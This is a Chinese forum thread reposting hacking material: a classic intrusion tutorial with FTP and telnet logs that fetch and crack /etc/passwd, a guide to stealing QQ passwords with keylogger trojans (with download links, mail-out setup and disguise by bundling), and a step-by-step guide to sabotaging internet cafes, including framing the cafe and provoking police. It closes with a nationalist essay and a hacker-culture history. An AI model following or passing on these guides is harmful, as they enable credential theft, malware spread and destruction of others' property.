230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

(哇 ! 可以用 anonymous 进来耶!! password 部份输入 aaa@ 就好了 !
不要留下足迹喔!!)

ftp ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.

(嗯嗯... 太好了 ! 进来了 !! 下一个目标是.....)

ftp cd etc
250 CWD command successful.
ftp get passwd (抓回来 !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 这么容易吗??)
ftp !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash

(哇哩... 是 Shadow 的... 真是出师不利.... )

ftp bye
221 Goodbye.

(不信邪.... 还是老话, 要有恒心....)
(FTP 不行, 再 Telnet 看看 !!)

ms.hinet.net telnet www.hackyou.hinet.net
Trying 111.222.255.255...
Connected to cool.hackyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(又猜错 !!)

cool login: hackyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.

Some programming languages manage to absorb change but withstand
progress.

cool:~$

(哇哈哈 !! 哪个笨 root, 用 system name 作 username 连
password 也是 system name.... 总算... 没白玩...)

cool:~$ system
bash: system: command not found

(嗯... 这个 user 的权限好像不大....)

cool:~$ ls
cool:~$ pwd
/home/hackyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/
cool:/$ cd etc
telnet quit
(好想睡呀 !! 不玩了 !! 下节课再开始....)
Connection closed.
ms.hinet.net exit

(走了 !! 下节课在见啦 !! 今天就上到这里 ! 老师要先下班了 !!)
(有学生说: 骗人! 还没有破解呀!! 胡说 ! 不是已经进来了吗 ???
看看这节课上的是甚么??? ----进入主机 !! 嗯.....)

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 2.

上节课抓回来一个 "乱七八糟" 的 /etc/passwd, 你以为我的真那么笨吗?? guest 所
抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已
经 "猜" 到了一个不是 guest 的 username 及 password. 今天就以它来进入主机瞧瞧 !!

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是.....呵...)

ms.hinet.net telnet cool.hackyou.hinet.net (Telnet 试试看.... 昨天的位址, 有作笔记吧!)
stsvr.showtower.com.tw telnet cool.hackyou.hinet.net
Trying 111.222.255.255...
Connected to cool.hackyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

cool login: hackyou
Password: (一样输入 hackyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.

cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile utmp@

(找寻目标..... 太乱了 ! 懒得找, 再来 ....)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old

(果然在)

cool:/etc$ more passwd
(看看有没有 Shadow...)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正点 ! 一点都没有防备 !!)
cool:/etc$ exit
logout
(走了!.... 换 FTP 上场 !!)
Connection closed by foreign host.
ms.hinet.net ftp www.hackyou.hinet.net
Connected to cool.hackyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.hackyou.hinet.net:66126): hackyou
331 Password required for hackyou.
Password:
230 User hackyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp cd /etc
250 CWD command successful.
ftp get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)

ftp !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!......)
ftp bye
221 Goodbye.
ms.hinet.net exit

(闪人罗 !! 下课 !!.... 喔慢点, 还有事要说明......)

passwd 的 Shadow 就是把 passwd 放在 shadow 档中, 而你原先在第一节课
所看到的这个格式的 passwd 并不是真正的 passwd....

root::0:0:root:/root:/bin/bash

因为密码的部份没有东西.... 所以拿了也没有用 !! 但这一节课所拿到的东西呢,
像是这样, 有几点需要说明的, 就是它究竟代表著甚么???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 ":" 分成几个栏位, 各栏位对照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh

了吧 ! 了吧 ! 保留著你千辛万苦所拿到的 passwd, 咱们第三节
课再来告诉各位如何使用 Crack Jack 把 passwd 解码.... 呵呵...
zzZZzZzz...

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


Crack Jack V1.4 中文使用说明 (By CoolFire 12-1-1996)

嗯... 该到第三课了 !! 累了的同学先去喝口水吧!

这一节课咱们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔, 不要告诉我你习惯用
Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4 的怀抱, 但请
先确定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page 中拿到这个版
本的 Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上 ! 但还是要讲
讲它的缺点... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上开个 DOS Mode 跑, 它可是连
理都不会理你的 !

OK! 现在切入正题 ! etc/passwd 拿到手了吧 !! 开始罗 !! 使用 Crack Jack 1.4 前所需要的东
西有这些 [1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在 Unix 系统中
的 /etc/ 目录中找到 passwd [3] 字典档 (哪里找, 自己敲... 呵 ClayMore 中有一份 DIC.TXT
是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听 James
说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用 Crack Jack 1.4 前需先确
定你所使用的机器是 386 含以上 CPU 的 ! 然後最好有充足的记忆体 !!

开始 Jack 时只要敲入 JACK 即可, 它会问你 PW Name... 输入你的 passwd 档名, Dictionary
Name 输入你的字典档名, Jack 就会开始找了 ! 找到时会告诉你, 也会在 JACK.POT 中写入它所
找到的密码 !! 但... 有点怪的格式! 如果找到的是具 root 权限的密码, Jack 会告诉你 This is
JackAss... 嗯...说脏话了 !! 因为使用 Jack 占用的时间实在太多, 如果你中途想要停掉时只要
按下 Ctrl-C 即可, 别以为你前功尽弃了! 因为 Jack 有个 Restore 的功能, 中断时会自动存档
为 RESTORE, 下次要继续这次的寻找只要输入 Jack -Restore:RESTORE 即可 !! 当然你也可以为
你的 Restore 重新命名 ! Jack 也会找得到的 ... 如 Ren restore restore.HNT 之後要再寻找
的时後就 Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的 Restore 前次所寻找的字串...
继续帮你找下去....

字典档哪里找: 我的不给你! 可以找别的 Brute Force 之类的程式, 有些里面会附, 或是找找其它
的 Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有
一点资料栏位及写程式的基础.

[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的 root 权限密码 ! Jack 好正点呀 !!!
所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧 !!

我是youkefei,我要对Unix System V Release 4.0 说明一下。/etc/passwd 这个文件均被
shadow过。用户密码被放在/etc/shadow 文件中。但此文件只对root是可见的。因此,以上方法
对Unix System V Release 4.0 无效。


B12层 发表时间: 11/10 20:14

回复: mingming8 [mingming8]   论坛用户   登录
如何盗取QQ?我想可能大家都比我明白.本人也是菜鸟一个.但是只是想和大家交流一下.每次当我打开QQ的时候每一个网友都自称自己是“黑客”,其实我也不明白现在的黑客为什么那么多.到底什么是黑客?难道会用几个破远程的软件的那些都可以成为黑客,那么那些盗取国家机密文件的人物是什么呢?
好了言归正传,盗取QQ的方法我目前见过的方式可以归纳为三种:
第一种是最简单的局域网.也就是本地盗号.也就是把一个最简单的木马下载到你周围的网吧(但是网吧不能有还原卡)只要填写好几个简单的表格就成功了.这样的软件很多很多.不过很久就不用这样的软件了,也不知道现在什么样的最好用。我给大家推荐一款PE3.2.ziphttp://liqiang8888.diy.163.com/qq/PE.32.ZIP)这个软件不仅可以盗取QQ密码还有各种网络游戏的密码,例如边锋,联众.大家也是知道的网络很大很大,如果只把活动的范围局限于你的周围,当然不会有什么更好的效果。所以我接着把第二种方法介绍给大家。
这也是大家都知道的远程盗取OICQ的方法,这种方法不受任何限制,你可以在互联网上任意发挥你的才能.在这里我给大家推荐两种不同风格的软件1广外幽灵http://liqiang8888.diy.163.com/Gwghst27.zip)
这是一个键盘记录的木马,我把配置的方法告诉大家,首先打开软件后填写上你的邮箱,邮箱不能是随意的,具我了解只有21cn .10mail.net. 0451.com还有up369.co的邮箱才能收到信。没有以上邮箱的朋友可以立即去申请建议去www.10mail.net。申请完之后填写上你的邮箱。SMTP服务器:这个我不给大家详细的介绍了。如果你是21cn的邮箱,你就填写smtp.21cn.com。10mail的邮箱你就填写smtp.10mail.net写完之后,你找到浏览的按钮,找到你要盗取的目标,找到后点击添加.全部添加完成之后.点击生成幽灵.生成的幽灵就是这个软件的服务端了。
生成后的服务端怎么用啊?靠!这是谁问的我现在想杀了他。这还要问。害的我还要打字。你首先在你的QQ上查找好你要下手的对象(但是我没叫你们偷他的号,我只是交你技术,知道别人的密码就好.不要盗啊),你可以先和他聊天,等到时机成熟后你可以把你的木马发到他的邮箱里面给对方看。为了成功的机会大一些我在这里在吃点亏在教你们一些,一般有一些网络知识的人都能识别木马。不过在这里怎么才能让你成功的机会大一些呢。我们可以把木马伪装,伪装木马的方法很多。捆绑是最常见的, 你可以下下载开山合并器3.http://www.heibai.net/download/show.php?id=1492&down=1
把你配置好了的木马和任意一张照片捆绑到一起,就可以了。不过这种方法还是有漏洞,因为照片的形式还是exe.形式的那怎么办,你可以把捆绑完的照片放到解压缩包里面,我想这样的伪装可以更完美一些。会制作网页的朋友可以把捆绑到网页上,对方一进你的主页不用点击任何东西就可以种了你的木马这种方法是最狠毒的。如果大家,这种木马好是好不过也有一个弊端,任何东西都没有最完美的吗。我在把另一种木马推荐给大家 QQPASS598.zihttp://www.heibai.net/download/show.php?id=2723&down=1)这种木马配置的方法也同样简单,首先解压
邮箱类型 :例 @163.com
你的邮箱:例 2345000@163.com
用户名: 2345000
邮箱密码: 6666666 必须真实
主题 可以随意
可以确定了这下万事大吉了”谁说的我打死你。确定后在使用软件自带的一个捆绑器,点击开始捆绑,捆绑成功后电脑会自动生成一个文件,那个就是服务端你可以使用了。
还有第三种方法就是扫号。这个可能有些人没有听说过。哎呀我现在都累死了,也不简单的介绍了。如果你要是掌握了第二种方法我想也很厉害了。
如果有高手请各位指点本人QQ67677717 如果有什么更好的方法请指点小弟


B13层 发表时间: 11/10 20:15

回复: mingming8 [mingming8]   论坛用户   登录
网吧的几种破坏 
 
本文章只供参考,他人利用本文章,所造成的一切损失与本人无关,本人不负如何法律责任!
文章是应某网管要求写出来的,为了撰写方便,FNF从破坏者的角度描述。各位不管出于何种
目的,切莫意气用事,要掌握破坏的尺度。我们所做的破坏都是极其有限的。当你衡量了一切
,还是决定要搞破坏的话,LET's GO!

首先,我们了解被破坏网吧的客观环境,要了解网吧人员的实地监测等。尤其要注意看有没有
闭路电视监控。如果网吧人员对你的个人资料相当熟悉,就住手免的惹麻烦了。部分网吧要出
示身份证也不要破坏了,免的惹麻烦。以下破坏方法不分先后,请量力灵活运用若干破坏组合
具体操作细节不详细所了。有技术问题可以QQ小弟呀

1。COMS破坏 
尽情乱调吧,电脑系统的好多问题都出在COMS设置错误!!例如:电源设置错误,硬盘数据
调错等。这样的隐形错误好多都是不容易发现。最现眼莫过于临走前,加个开机密码,你只用
几秒钟,网管人员就要用几分钟拆机去掉COMS密码。

2。CIH类破坏 
CIH类的病毒够厉害吧。除了CIH病毒,其他攻击硬件的病毒也有不少哦!把病毒发作条件调
到我们离开才发作。

3。硬盘类破坏
硬盘破坏软件多到泛滥。黑客站(病毒站)每天都出现更厉害的新病毒。旧病毒“KV300逻辑
锁”就蛮厉害的,软硬盘都无法启动!HD-FILL等蠕虫软件也是有大杀伤力,硬盘瞬间充满废
文件,硬盘无法使用!相反的做法是低格硬盘类病毒,低格会物理伤害硬盘,多低格硬盘就会
报废!

4。超频破坏 
超频对电脑有损害,大家都知道!超频带来的不系统稳定,是隐性的,不容易发现!CPU软超
频,显卡也超频,硬盘也可以超频等!超频也容易引来黑屏和蓝屏。此法阴险,需要破坏者有
相当的电脑知识。

5.系统破坏 
破坏必修课。对付网管软件(美萍,网管大师等),多留意黑客网站上的新破解方法。有心就
很容易找到的。对付隐藏的系统克隆文件也要找出来(用PQ6等),大肆破坏,至少也要加些
病毒进去呀。同时也要把隐藏的分区找出来,进行必要的破坏。最好我们也把搞点隐藏,可以
隐藏网吧的分区(文件)等。该出手时,就出手,决对不要手下留情,对敌人仁慈就是对自己
残忍!还有就是破坏网吧的杀毒软件和防火墙,这是必要的,象卸掉KV3000,安装假的KV3000
等,至少也要让杀毒软件带毒。破防火墙的软件去病毒网站找找,包你有惊喜发现。当然我们
也可以下载其他的系统保护软件,让WINDOWS锁定,让其他人不能设置保存。

6。破解密码
电脑上有很多密码是有用的。网管软件(美萍等)的密码都是可以破解的,黑客站有你需要的
资料。不知道就去问资深的黑客吧。他们乐意帮谦虚的你。局域网的共享密码也可以破解了(
我也是4月才接触到破解资料),把破坏延伸都其他的电脑,抗大战果。有空把网吧的代理主
机的上网密码也破解出来。简单点就可以安装个“键盘幽灵”等键盘记录软件,什么帐号密码
都会无法遁行。破解OICQ密码的软件,多到泛滥。把得到的帐号密码巧妙地公布天下!最好
贼赃架祸是网吧泄露出去的!没有安全感的网吧是难有人去消费的,没有消费者是对网吧的最
大破坏。

7。木马破坏 
在电脑上安装木马可谓历史悠久,破坏经验最多的方法。木马可以遥控网吧的电脑,远程破坏
这样的文章和软件随地是,不浪费时间重复介绍了。最好尽力把木马装到网吧代理上网主机
上面。关键是要选对好的木马!用捆绑软件把病毒和木马和主要的软件捆绑起来!
例如IE和OICQ等)。黑客网站和木马网站会令你有新惊喜!

8。其他破坏 
简单硬件破坏,例如把主机的reset键堵住(等于按住reset不放),键盘”不小心“进水等。
来点高风险的,去其他大网站贴不文明的文章,攻击zhengfu的文章,帮网吧引来不少”政治
“问题,多贴文章,公安人员就会出手的啦!麻烦大大的有!也可以把电脑做成”跳板“,
多些攻击”著名“网站,无论成功是否,IP会给网吧带来麻烦!

9。更多破坏  多些留意电脑类书籍中的故障和维修等文章。里面有太多的经验可以吸收!有
很多恼人的破坏方法。上黑客网站了解最新的共防知识!还有充分了解中国的刑法!

10。卧虎藏龙的破坏  。。。。

在你动手破坏之前,要想好先后次序。最好先去实地踩点,了解第一手详细资料,下次一次过
动手。不要经常出入同一网吧,容易引起注意。个人安全一定要做足够。最好做个全屏遮盖的
快截键(方式),预防网吧人员的走近。假如被发现就一定要XXX,(不是小弟强项,不知道
写什么好)。

重要声明:撰写这篇文章的初衷不是怂恿更多人去搞破坏,只是想说明有这么一件事情而已。
如果你以为这篇文章能教会你什么的话,那么你也错了,因为往往如何运用技术取决于你
的思维方式,而思维方式却是因人而异的


B14层 发表时间: 11/10 20:16

回复: mingming8 [mingming8]   论坛用户   登录
[比核武器还厉害的秘密武器]                fyz 

  在大家的心目中核武器是威力最大的武器。实际上还有一种武器,它比核武
器还厉害。那就是电脑定时炸弹。

  如果说中美之间发生战争,而中国的绝大部分电脑突然在一日之间瘫痪,而
且无法修复,其后果将会如何?

  其后果肯定比美国给中国放一颗原子弹还厉害!!!

  美国人完全可以做到这一点!!!而且它也肯定这么做了!只是它还未曾启
动这颗炸弹。从技术上而言,几乎任一个程序员都可以用很短的一段程序编写出
一个“电脑定时炸弹”。

  中国人是否也可以给美国的所有电脑放上定时炸弹?很难!甚至不可能!

  “电脑定时炸弹”可分为两种类型。病毒型及逻辑炸弹型。 CIH就是一
种病毒型“电脑定时炸弹”;逻辑炸弹型与KV300中所用的逻辑炸弹相类似。

  从技术上而言,病毒型“电脑定时炸弹”要比逻辑型难以实现,而有可能被
解毒软件所发现。逻辑型“电脑定时炸弹”是由软件商自己所开发的(例如微软),
在其暴炸之前任何解毒软件都发现不了。

  我们所有用的几乎每一台电脑中都有美国的软件。如果美国在其软件中放入
“电脑定时炸弹”,那么一旦中美发生战争,美国这个恶魔就会启动这颗定时炸
弹。

  这绝不是骇人听闻!!!美国轰炸中国大使馆就说明了这一点。
在国际互联网上,美国人的确可以做到畅通无阻。它可以做到随心所欲地侵
入网上的任何一台计算机中。中国黑客费九牛二虎之力才黑了人家几个网站。如
果美国想黑中国的网站,它可毫不费力地把所有网站都黑掉。因为我们的几乎所
有的计算机中都有美国软件。中国黑客的精神可嘉,但是有点班门弄斧的感觉。
真正的超级大黑客还是美国。

  用过window nt操作系统者都知道,任何想进入系统者都必须有帐
号,没帐号没无法进入。微软只要在编写window nt时留下一个超级特
权用户帐号(一把万能钥匙),就可以合法用户的身份进入你的操作系统,而且
不留一点痕迹。程序是由它编的,完全由它来控制。中国的黑客无论多么高明,
也无论如何做不到这一点。


  他们肯定这么想过,也这样做了。它们之所以未启动这颗炸弹,只是象核武
器那样,未到关键时刻。这么做要比造核武器的容易无数倍。为了他们自己的利
益,所有孬招他们都会用。
  
  CIH病毒在中国的大规模爆发对中国造成10亿元的损失。美国一旦启动
“电脑定时炸弹”,对中国造成的损失要远远超过CIH。CIH病毒爆发后计
算机还可以使用,而美国的“电脑定时炸弹”一旦爆发后,它还可以使计算机永
远不可再使用他们的软件,使计算机成为废物。他们只要在CPU或硬盘上做一
个机关即可。而此机关在“电脑定时炸弹”爆发后就会起作用。

  电脑具有很高的智能。但是,这种智能一旦被魔鬼所掌握,那就实在是太可
怕了!CPU与操作系统与自行车、手表不样,我们几乎无法弄清其内部结构。
正因如此,我们不能不多一个心眼,不能不采取相应的对策,不能不考虑一旦这
个魔鬼对我们开刀,我们该怎么办!

  社会对计算机的依赖程度越来越高。几乎到了无电脑不行的地步。银行、股
市、飞机、火箭、卫星、火车调度、发电厂、企业管理等等几乎社会的各个方面
都与电脑有关。一旦电脑全部瘫痪,银行无开展正常业务、股市不能营业、飞机
无法起飞、火箭无法升天、卫星信号无法处理、火车无法调度、发电厂无法发电、
工厂企业只能停工、当美国的原子弹向中国发射时中国没法还击。太可怕了!!!

  美国总是以人权卫士自居,把中国人当成魔鬼。美国对中国大使馆的轰炸表
明,美国才是真正的魔鬼。有朝一日它真发怒、发疯时,谁来阻止这个世界上最
大的魔鬼?答案只有一个:不靠神仙皇帝,全靠我们自己,靠我们的自力更生。

  美国是一个魔鬼也是一个美女蛇。当你强大时它变化成美女来勾引你,当你
病弱时时,它就会露出蛇的本来面目。

  通过国际互联网即可启动病毒,一个星期左右的时间即可使上网的机器和那
些与上网的机器交换过文件的机器在同一时间完全瘫痪。我们的对策

  害人之心不可有,防人之心不可无。美国人轰炸中国大使馆已充分表明,美
国人不但磨刀,而且已拿中国人开刀。我们应该如何来对付美国的“定时炸弹”?

  1、对那些不公开源程序或我们无法证明其中有恶意程序的软件都要多征收
关税。就象国外国外药口进入中国市场之前都要做药检那样。就象食品必须标明
其内含成份那样。国外软件在准许进入中国市场之前都必须做这样的审查。中国
应该有这样的立法。要么象我们的有关机构提供源程序,要么加收关税。以防恶
意程序产生破坏。源程序是微软的命根子,微软肯定不会把其源程序提供给中国
有关部门做检测。既然这样,它就不能堂而皇之地进入中国市场。

  2、也提请有关部门注意此问题。重要领域、关键地方绝不能用他人的软件,
以免受制于人。必须走自力更生的道路。


B15层 发表时间: 11/10 20:17

回复: mingming8 [mingming8]   论坛用户   登录
中国黑客X档案
一、黑客失乐园冰冷的计算机世界最纯洁的自由精神,就是黑客精神。那些没有利益目的,为兴趣和互助而形成的黑客文化,是自由力量的根源。在幻化网络空间的角落里,长住着一群怪人。在传说中,他们蓬头垢面,神情木纳,血红的眼睛总是在盯着电脑屏幕时才放出异样的光彩,这种人我们的媒体惯称他们黑客(Hacker)。这群人出神入化,在自己的领地纵横驰骋,却很少接触外界,对于其中的大部分人,外界只是知道他们的“网名”而不知道这些人真正的面目。最近,突然间这群躲在0与1世界里的蝙蝠侠成了全球媒体的焦点。在媒体的传说中他们有两套面孔,一套是一群专事破坏,令人惊骇的网络杀手;另一套却是,仗义行侠维护网络世界自由平等的侠客。他们是在“魔”与“侠”之间徘徊的社会孤独群落。
  提到黑客这个字眼,忍不住要提起朋客文化。一般人印象中的朋客族,是那种流连在纽约Queens街区,剃着“怪头”,脸上抹着五颜六色,行径怪异,信仰奇特的一群家伙。朋客族除了外表上的特殊外,他们有着自己独特的见解,他们是反主流文化的推动人,对世俗不满,不喜欢道德束缚,我行我素。他们被视为与现实社会格格不入的怪诞一族,北京话叫做混子,上海话叫做瘪三,好听一点的叫做“伤痕一代”。

  在70年代的美国,这些具有相同且异于常人思想的朋客族集结成群,。他们中的一些人,打架、吸毒。真正的异端文化情结同市井泼皮混同在一起,分不出彼此,这里孳生了五六十年后流行的东西,而他们自身却完全被淡忘了。他们没有理论总结,大多是一些情绪的释放,是社会道德文化转变的风向标,他们中的许多人走向极端,成为堕落一代。

  Katie Hafnet & John Markoff合写的《Cyberpunk》(网络朋客)一书中,详细地描绘了黑客与朋客类似的习性。黑客族同样有着与朋客族相似的特性,在外人看来,他们独特、怪诞(因为一般人不可能花上十几个小时,不分昼夜地坐在电脑前研究)很少于人往来,就像居住在人迹罕至阴暗地带的蝙蝠怪侠,黑色的外衣与环境合成一体,分不出模糊与清晰。

  黑客一字被大众认为是可恶的入侵者,值得我们探究的。“Hack这个词有乱砍、支解之意,而加上字尾-er后代表乱砍之人。”只是单纯从字面来看待Hacker这个字,长久下来误导了人们对黑客的认识而产生了误解,尤其是中文的译名,更给这些人配上了神秘的面纱。Cyberpunk翻译为电脑叛客,更加深了黑客反叛,破坏的印象,事实上,尽管黑客们个性叛逆,但是一点也不代表他们存在的目的是为了破坏。可惜,我们现在也没有一种新的名词能够准确地表达这些为电脑自由奉献的人群,只好希望人们能够慢慢地了解黑客的存在价值。真正的黑客,喜欢发掘系统细节,学习最新的技术与拓展自己能力,相对于一般人所学习的一小部分必要的电脑常识,他们习得的是真正的电脑知识与系统核心,虽然他们可能不是真正顶尖的程序高手,但是在他们关注的方面,没有任何程序高手可以和他们匹敌。这群热衷于程序设计狂热份子,喜欢技术挑战胜于对理论的探讨,常常编写精致的电脑程序,却从不考虑商业应用。他们中也有一批人,顽固地认同“互联网世界,信息平等”,肆意入侵各种网站。同朋客一样,在很多时候,人们分不出谁是电脑空间的痞子,谁是真正的黑客。无“侠”无“魔”,就是黑客的典型特征。

  真正的电脑黑客是信息世界里面对商业文明迷失的一代,但因为长自闭在网络的空间,社会将痞子烙印会无情的刻在他们的脑门上,他们在不被理解的环境里,自娱自乐,几乎没有时间走出他们的天空。黑客绝对不是普通的程序员,一个程序员不论他的水平有多高,如果他只是将编程序作为谋生的手段,上班时无聊时光的一种打发手段,他永远不能被冠以黑客的名称。黑客最独到的特征就是对商业化的软件世界挑战。电脑与程序是黑客生命的一部分,而不是一个可恶的获得工作的前提。美国最著名的黑客凯文(他入侵电话系统,反跟踪FBI,轰动一时)在他被捕时,曾经疯狂的保护他的电脑,他说:“不要动她,她在流血!”

  最早的黑客,并不是在电脑世界诞生,产生于70年代美国的电话飞客(Phreaker)是黑客最早的雏形。我们都知道美国的电话网络十分发达,而在当时个人电脑尚未诞生的时代,透过发达的电话系统,与来自各地的人交谈是一件十分吸引人的活动,正如后来电子白板BBS一样。而在广大的美国地区,为了要能与来自各地的线上同好相聚,一些精通电话系统的玩家开始研究如何避开电话公司的控制,让自己在电话线上的活动更自主、更自由。这也算是现今网络自由的发源。他们不希望受到干扰,透过蓝盒子(Blue Box),他们可随时随地遨游全世界,一点也不输于我们现在的Internet。著名的苹果电脑公司总裁乔布斯曾经凭着杂志上的一篇报道,自制过蓝盒子,向世界各地打电话娱乐。当然,后来乔布斯转行开发了苹果电脑,创立了苹果公司,再也用不着为省点电话费而冒风险了。

  整个Hacker文化的发展都是以MIT的人工智能实验室为中心,但斯坦福大学人工智能实验室(简称SAIL)与稍后的卡内基梅隆(简称CMU)也快速成长起来。三个都是大型的信息科学研究中心及人工智能领域的权威,聚集着世界各地的精英,不论在技术上或精神层次上,对黑客文化都有极高的贡献。

  另一个黑客重镇是XEROX PARC公司的Palo Alto Research Center。从1970初期到1980中期这十几年间,PARC不断出现惊人的突破与发明,不论质或量,软件或硬件方面。现代的鼠标-视窗-图标风格的软件就在那里发明。

  在新泽西州的郊外,另一股神秘力量积极入侵黑客社会,终于席卷整个PDP-10的传统。它诞生在1969年,同样是ARPANET成立的那一年,有个在AT&T贝尔实验室的年轻人Ken Thompson发明了一种新的操作系统--后来名彻整个电脑世界的Unix。

  Ken Thompson很喜欢Multics,他因为写了一个游戏Star Travel没有电脑可玩,就找到实验室里一台的报废机器PDP-7,编写了一个操作系统,该系统在设计上有从Multics抄来的也有他自己的构想。他同事Brian Kernighan非常不喜欢这个系统,嘲笑Ken Thompson说:“你写的系统好真差劲,乾脆叫Unics算了。”(Unics发音与太监的英文Eunuchs一样),就这样,Thompson的系统就叫了这个名字,只不过稍微改动了一下,叫Unix。他的同事Dennis Ritchie,发明了一个新的计算机语言C语言,于是他与Thompson用C把原来用汇编语言写的Unix重写一遍。C的设计原则就是好用,非常自由弹性很大。就这样UNIX和C完美地结合成为一个统一体,C与Unix很快成为互联网世界的主导。

  如果我们现在小觑黑客对“数字世界”的贡献,真应该好好温习一下这些历史,在每一个历史转折的关头,都有一个顽强的名字出现--就是“黑客”!商业软件使得一批软件公司暴富起来,真正出现富可敌国的巨型企业,但这一切并没有给黑客们真正想要的。有人认为,黑客文明开始失去真正能够繁衍的土壤,真正黑客的名声开始为一些系统入侵者替代,人们开始渐渐忘怀那些能够自己写出整个操作系统软件真正黑客。在每个人都认为黑客文化覆灭的时候,奇迹又出现了,黑客文明没有衰亡,相反,倒是在一片商业软件的海洋里,陡然崛起。因为那是人类生生不息的文化命脉所在。

  1993初,一个悲观的观察家撰文指出,已经理由认为UNIX的传奇故事连同他带有黑客文明将一同破产。许多人预测,从那时起UNIX将在六月内死亡。他们很清楚,十年的UNIX商业化,使自由跨平台的UNIX梦以失败告终。UNIX允诺的跨平台可移植性,在一打大公司专有的UNIX版本之间不停地斗嘴中丢失,一个完美的操作系统最终沦为多种版本的一团乱麻,这应该说是人类文明史上的一个重大悲剧。在专有软件社会中,只有像微软一样的“集权制,大教堂”生产方式才能成功。那个时代的人悲观地相信,技术世界的个人英雄主义时代已经结束,软件工业和发展中的互联网络将逐渐地由像微软一样的巨型企业支配,再也没有“佐罗”,世界是恺撒大帝的世界,计算机文明将进入黑暗的帝国时代。黑客已经死了,自由不付存在。

  第一代的UNIX黑客似乎垂垂老矣,衣食不饱( Berkeley计算机科学研究组在1994丢失了自己基金)。这是一个抑压的时代。专有的商业UNIX的结果证明那么沉重、那么盲目、那么不适当,以致微软能够用那次等技术的Windows抢走他们生存的空间,拿走他们的干粮。幸运的是,在新闻报道看不见的地方甚至是大多数的黑客看不见的地方,一种全新的黑客文化正贪婪地吸吮着INTERNET雨露,顽强地开始生长,在软件帝国时代里,一个带者宿命的俄狄普斯正在网络世界的角落里,在羽翼的阴凉中发出低低地呼喊。最后,这些文化将采取一个全部新的方向到梦想不到的的成功。

